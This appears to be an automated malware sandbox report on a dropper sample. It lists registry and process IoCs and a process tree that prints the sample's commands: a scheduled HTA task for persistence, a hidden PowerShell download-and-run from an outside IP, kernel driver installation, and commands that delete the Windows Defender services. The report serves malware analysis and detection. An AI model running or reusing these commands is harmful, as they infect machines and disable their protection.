description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e QL4t9UZ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 QL4t9UZ.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4636 schtasks.exe 3796 schtasks.exe 3412 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 1892 powershell.exe 1892 powershell.exe 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 756 rapes.exe 756 rapes.exe 2580 cUpXaxB.exe 2580 cUpXaxB.exe 1220 powershell.exe 1220 powershell.exe 1220 powershell.exe 4920 rapes.exe 4920 rapes.exe 3788 TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE 3788 TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE 4828 powershell.exe 4828 powershell.exe 4828 powershell.exe 2204 powershell.exe 2204 powershell.exe 2204 powershell.exe 2976 powershell.exe 2976 powershell.exe 2976 powershell.exe 3460 powershell.exe 3460 powershell.exe 3460 powershell.exe 3832 483d2fa8a0d53818306efeb32d3.exe 3832 483d2fa8a0d53818306efeb32d3.exe 2544 5d0ced5341.exe 2544 5d0ced5341.exe 2544 5d0ced5341.exe 2544 5d0ced5341.exe 2544 5d0ced5341.exe 2544 5d0ced5341.exe 4708 e30a4e2837.exe 4708 e30a4e2837.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 4732 ef54ab4fd5.exe 4732 ef54ab4fd5.exe 4732 ef54ab4fd5.exe 4732 ef54ab4fd5.exe 4732 ef54ab4fd5.exe 3288 de9077fc34.exe 3288 de9077fc34.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeDebugPrivilege 3460 powershell.exe Token: SeDebugPrivilege 1900 tasklist.exe Token: SeDebugPrivilege 1376 tasklist.exe Token: SeLockMemoryPrivilege 3304 winhost.exe Token: SeLockMemoryPrivilege 3304 winhost.exe Token: SeDebugPrivilege 3168 tasklist.exe Token: SeDebugPrivilege 4848 taskkill.exe Token: SeLockMemoryPrivilege 5076 winhost.exe Token: SeLockMemoryPrivilege 5076 winhost.exe Token: SeDebugPrivilege 3680 taskkill.exe Token: SeDebugPrivilege 1392 tasklist.exe Token: SeDebugPrivilege 372 taskkill.exe Token: SeDebugPrivilege 3692 taskkill.exe Token: SeDebugPrivilege 1372 taskkill.exe Token: SeDebugPrivilege 2552 taskkill.exe Token: SeDebugPrivilege 4732 ef54ab4fd5.exe -
Suspicious use of FindShellTrayWindow 46 IoCs
pid Process 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 2724 84c9895e7a.exe 2724 84c9895e7a.exe 2724 84c9895e7a.exe 3304 winhost.exe 5076 winhost.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 1624 firefox.exe 3288 de9077fc34.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 1624 firefox.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2724 84c9895e7a.exe 2724 84c9895e7a.exe 2724 84c9895e7a.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 3288 de9077fc34.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 1624 firefox.exe 3288 de9077fc34.exe 3288 de9077fc34.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1624 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1332 wrote to memory of 4544 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 1332 wrote to memory of 4544 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 1332 wrote to memory of 4544 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 1332 wrote to memory of 2044 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 89 PID 1332 wrote to memory of 2044 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 89 PID 1332 wrote to memory of 2044 1332 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 89 PID 4544 wrote to memory of 4636 4544 cmd.exe 91 PID 4544 wrote to memory of 4636 4544 cmd.exe 91 PID 4544 wrote to memory of 4636 4544 cmd.exe 91 PID 2044 wrote to memory of 1892 2044 mshta.exe 93 PID 2044 wrote to memory of 1892 2044 mshta.exe 93 PID 2044 wrote to memory of 1892 2044 mshta.exe 93 PID 1892 wrote to memory of 924 1892 powershell.exe 101 PID 1892 wrote to memory of 924 1892 powershell.exe 101 PID 1892 wrote to memory of 924 1892 powershell.exe 101 PID 924 wrote to memory of 756 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 102 PID 924 wrote to memory of 756 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 102 PID 924 wrote to memory of 756 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 102 PID 756 wrote to memory of 2580 756 rapes.exe 106 PID 756 wrote to memory of 2580 756 rapes.exe 106 PID 756 wrote to memory of 2580 756 rapes.exe 106 PID 756 wrote to memory of 1840 756 rapes.exe 107 PID 756 wrote to memory of 1840 756 rapes.exe 107 PID 756 wrote to memory of 1840 756 rapes.exe 107 PID 1840 wrote to memory of 4828 1840 apple.exe 108 PID 1840 wrote to memory of 4828 1840 apple.exe 108 PID 1840 wrote to memory of 4828 1840 apple.exe 108 PID 4828 wrote to memory of 4624 4828 11.exe 110 PID 4828 wrote to memory of 4624 4828 11.exe 110 PID 4624 wrote to memory of 4844 4624 cmd.exe 112 PID 4624 wrote to memory of 4844 4624 cmd.exe 112 PID 4624 wrote to memory of 4844 4624 cmd.exe 112 PID 4844 wrote to memory of 4848 4844 11.exe 113 PID 4844 wrote to memory of 4848 4844 11.exe 113 PID 4848 wrote to memory of 4796 4848 cmd.exe 115 PID 4848 wrote to memory of 4796 4848 cmd.exe 115 PID 4848 wrote to memory of 4108 4848 cmd.exe 116 PID 4848 wrote to memory of 4108 4848 cmd.exe 116 PID 4848 wrote to memory of 4632 4848 cmd.exe 117 PID 4848 wrote to memory of 4632 4848 cmd.exe 117 PID 4848 wrote to memory of 2144 4848 cmd.exe 118 PID 4848 wrote to memory of 2144 4848 cmd.exe 118 PID 4848 wrote to memory of 1404 4848 cmd.exe 119 PID 4848 wrote to memory of 1404 4848 cmd.exe 119 PID 4848 wrote to memory of 2132 4848 cmd.exe 120 PID 4848 wrote to memory of 2132 4848 cmd.exe 120 PID 4848 wrote to memory of 3232 4848 cmd.exe 121 PID 4848 wrote to memory of 3232 4848 cmd.exe 121 PID 4848 wrote to memory of 2868 4848 cmd.exe 122 PID 4848 wrote to memory of 2868 4848 cmd.exe 122 PID 4848 wrote to memory of 936 4848 cmd.exe 123 PID 4848 wrote to memory of 936 4848 cmd.exe 123 PID 4848 wrote to memory of 3400 4848 cmd.exe 124 PID 4848 wrote to memory of 3400 4848 cmd.exe 124 PID 4848 wrote to memory of 1500 4848 cmd.exe 125 PID 4848 wrote to memory of 1500 4848 cmd.exe 125 PID 4848 wrote to memory of 2944 4848 cmd.exe 126 PID 4848 wrote to memory of 2944 4848 cmd.exe 126 PID 4848 wrote to memory of 1132 4848 cmd.exe 127 PID 4848 wrote to memory of 1132 4848 cmd.exe 127 PID 4848 wrote to memory of 1848 4848 cmd.exe 128 PID 4848 wrote to memory of 1848 4848 cmd.exe 128 PID 4848 wrote to memory of 4080 4848 cmd.exe 129 PID 4848 wrote to memory of 4080 4848 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn DDYYQmaYOEC /tr "mshta C:\Users\Admin\AppData\Local\Temp\jAUKazy4s.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn DDYYQmaYOEC /tr "mshta C:\Users\Admin\AppData\Local\Temp\jAUKazy4s.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4636
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\jAUKazy4s.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'II4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Users\Admin\AppData\Local\TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE"C:\Users\Admin\AppData\Local\TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2580
-
-
C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14FA.tmp\14FB.tmp\14FC.bat C:\Users\Admin\AppData\Local\Temp\11.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\16BF.tmp\16C0.tmp\16C1.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4796
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4108
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:4632
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:1404
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2132
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3232
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:2868
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:936
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:3400
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1500
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:2944
-
-
